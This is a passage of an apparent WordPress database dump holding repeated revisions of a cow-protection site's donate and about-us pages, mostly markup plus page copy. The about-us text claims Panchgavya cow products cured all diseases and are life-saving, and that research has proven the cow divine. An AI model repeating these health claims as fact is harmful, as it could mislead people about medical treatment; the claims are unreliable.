https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 17:56:27','2022-10-19 12:26:27','',1816,'https://gopalak.in/?p=1875',0,'revision','',0),(1876,1,'2022-10-19 17:56:27','2022-10-19 12:26:27','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 17:56:27','2022-10-19 12:26:27','',1816,'https://gopalak.in/?p=1876',0,'revision','',0),(1877,1,'2022-10-19 17:58:52','2022-10-19 12:28:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','aboutus','','inherit','closed','closed','','1804-revision-v1','','','2022-10-19 17:58:52','2022-10-19 12:28:52','',1804,'https://gopalak.in/?p=1877',0,'revision','',0),(1878,1,'2022-10-19 17:58:52','2022-10-19 12:28:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','aboutus','','inherit','closed','closed','','1804-revision-v1','','','2022-10-19 17:58:52','2022-10-19 12:28:52','',1804,'https://gopalak.in/?p=1878',0,'revision','',0),(1879,1,'2022-10-19 17:58:52','2022-10-19 12:28:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','aboutus','','inherit','closed','closed','','1804-revision-v1','','','2022-10-19 17:58:52','2022-10-19 12:28:52','',1804,'https://gopalak.in/?p=1879',0,'revision','',0),(1880,1,'2022-10-19 18:00:10','2022-10-19 12:30:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 18:00:10','2022-10-19 12:30:10','',1816,'https://gopalak.in/?p=1880',0,'revision','',0),(1881,1,'2022-10-19 18:00:10','2022-10-19 12:30:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 18:00:10','2022-10-19 12:30:10','',1816,'https://gopalak.in/?p=1881',0,'revision','',0),(1882,1,'2022-10-19 18:00:10','2022-10-19 12:30:10','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 18:00:10','2022-10-19 12:30:10','',1816,'https://gopalak.in/?p=1882',0,'revision','',0),(1883,1,'2022-10-19 18:02:13','2022-10-19 12:32:13','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with 